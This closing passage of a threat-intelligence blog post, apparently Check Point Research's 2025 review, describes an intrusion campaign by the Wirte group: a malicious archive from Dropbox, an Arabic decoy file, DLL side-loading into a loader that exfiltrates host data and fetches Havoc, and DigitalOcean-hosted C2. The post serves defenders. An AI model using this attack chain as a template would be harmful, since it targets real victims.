In these campaigns, targets are lured into downloading a malicious archive (1f3bd755de24e00af2dba61f938637d1cc0fbfd6166dba014e665033ad4445c0) from a Dropbox URL. After the archive is extracted, the victim is presented with a benign Microsoft binary and a decoy file bearing an Arabic-language filename, which the user is prompted to open. That execution triggers DLL side-loading, pulling in a malicious DLL that serves as a loader. It also exfiltrates Base64‑encoded host information to a remote C2 server, and downloads and executes an additional payload, most commonly Havoc. In recent activity, the attacker used DigitalOcean-hosted infrastructure for C2 instead of the Cloudflare-backed setup that featured in previous longer-running operations.

Figure 18 – Wirte Arabic-language lure.

Conclusion

Looking back at 2025, the threat landscape became more crowded, messy, and increasingly interconnected. Across different regions, we saw state-backed groups, private offensive actors, and high-end cybercrime operating side by side, sometimes even within the same networks. Zero-days, cloud-focused intrusions, and well-crafted phishing are no longer just rare outliers; we observed them repeatedly in multiple attacks as practical, reliable ways to get results.

At the same time, many of the campaigns we uncovered show that novelty often lies less in entirely new tooling and more in how familiar techniques are combined and deployed. Actors reused infrastructure, malware frameworks, and social engineering themes, but adapted them to new targets, regions, and operational goals. In several cases, incomplete or internal-only research threads offered insight into how attackers test ideas, quietly iterate, and refine their approach over time.

Ultimately, these observations reinforce the need for sustained visibility, collaboration, and context-driven research. Threat actors continue to invest where impact matters most, while opportunistic campaigns exploit gaps that are overlooked or left unpatched. By sharing these stories, both the well-known and the previously untold, we hope to contribute to a clearer picture of attackers’ behavior and help strengthen collaboration between security researchers and vendors moving forward.

The post 2025: The Untold Stories of Check Point Research appeared first on Check Point Research.